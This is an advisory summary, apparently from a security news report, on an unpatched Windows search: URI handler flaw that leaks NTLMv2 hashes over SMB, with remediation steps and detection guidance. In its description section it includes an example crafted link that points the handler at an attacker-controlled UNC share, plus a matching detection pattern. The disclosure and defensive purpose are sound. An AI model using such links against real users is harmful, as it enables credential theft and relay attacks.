Full Report
Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user's NTLMv2 hash to the attacker. Like in the case of CVE-2026-33829, which impacted the Windows Snipping Tool's ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress. CVE-2026-33829 refers to a spoofing vulnerability that could expose
Analysis Summary
# Vulnerability: Windows Search URI Handler NTLMv2 Hash Leak
## CVE Details
- **CVE ID**: Unassigned (The report references similarities to **CVE-2026-33829** and **CVE-2023-35636**)
- **CVSS Score**: Moderate (Estimated ~4.3 - 6.5 based on similar flaws)
- **CWE**: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
## Affected Systems
- **Products**: Microsoft Windows
- **Versions**: All versions supporting the `search:` URI handler (current Windows 10/11 environments).
- **Configurations**: Systems where NTLM authentication is enabled and outbound SMB traffic is permitted.
## Vulnerability Description
The Windows `search:` URI handler contains a flaw in how it processes the `crumb` parameter. Similar to a previous vulnerability in the Snipping Tool, this handler fails to properly validate provided paths. When a user clicks a crafted link (e.g., `search:query=test&crumb=location:\\<attacker-ip>\share`), the operating system attempts to access the specified Universal Naming Convention (UNC) path via the Server Message Block (SMB) protocol. This automatic connection triggers an NTLM authentication handshake, transmitting the user's Net-NTLMv2 hash to the attacker-controlled server.
## Exploitation
- **Status**: PoC available / Disclosed (Microsoft has declined to patch at this time).
- **Complexity**: Low (Requires minimal user interaction: clicking a link).
- **Attack Vector**: Network (via Web browser, email link, or malicious document).
## Impact
- **Confidentiality**: Medium (Disclosure of NTLMv2 hashes which can be cracked or used in relay attacks).
- **Integrity**: None (Directly).
- **Availability**: None.
## Remediation
### Patches
- **None**: As of June 2026, Microsoft has declined to issue a security update, stating the issue does not meet the "Important" or "Critical" severity bar for immediate servicing.
### Workarounds
- **Block Outbound SMB**: Restrict outbound traffic on ports TCP/445 and TCP/139 at the network perimeter or host firewall for devices that do not require external file sharing.
- **Enforce SMB Signing**: Enable "Digitally sign communications" for SMB to prevent captured hashes from being used in relay attacks against internal systems.
- **Disable NTLM**: Transition to Kerberos and disable NTLM authentication globally or via "Restricted NTLM" policies where feasible.
## Detection
- **Indicators of Compromise**:
- Outbound SMB connections to unknown or external IP addresses originating from local workstations.
- Application logs showing the execution of `search:` URI commands with external UNC paths.
- **Detection methods**: Monitor for process execution command lines containing `search:query=` and `crumb=location:\\`.
## References
- **Huntress Research**: hxxps[://]www[.]huntress[.]com/blog/unpatched-ntlm-leak-windows-search-uri-handler
- **Microsoft CVE-2026-33829 Advisory**: hxxps[://]msrc[.]microsoft[.]com/update-guide/vulnerability/CVE-2026-33829
- **Varonis Research (CVE-2023-35636)**: hxxps[://]www[.]varonis[.]com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes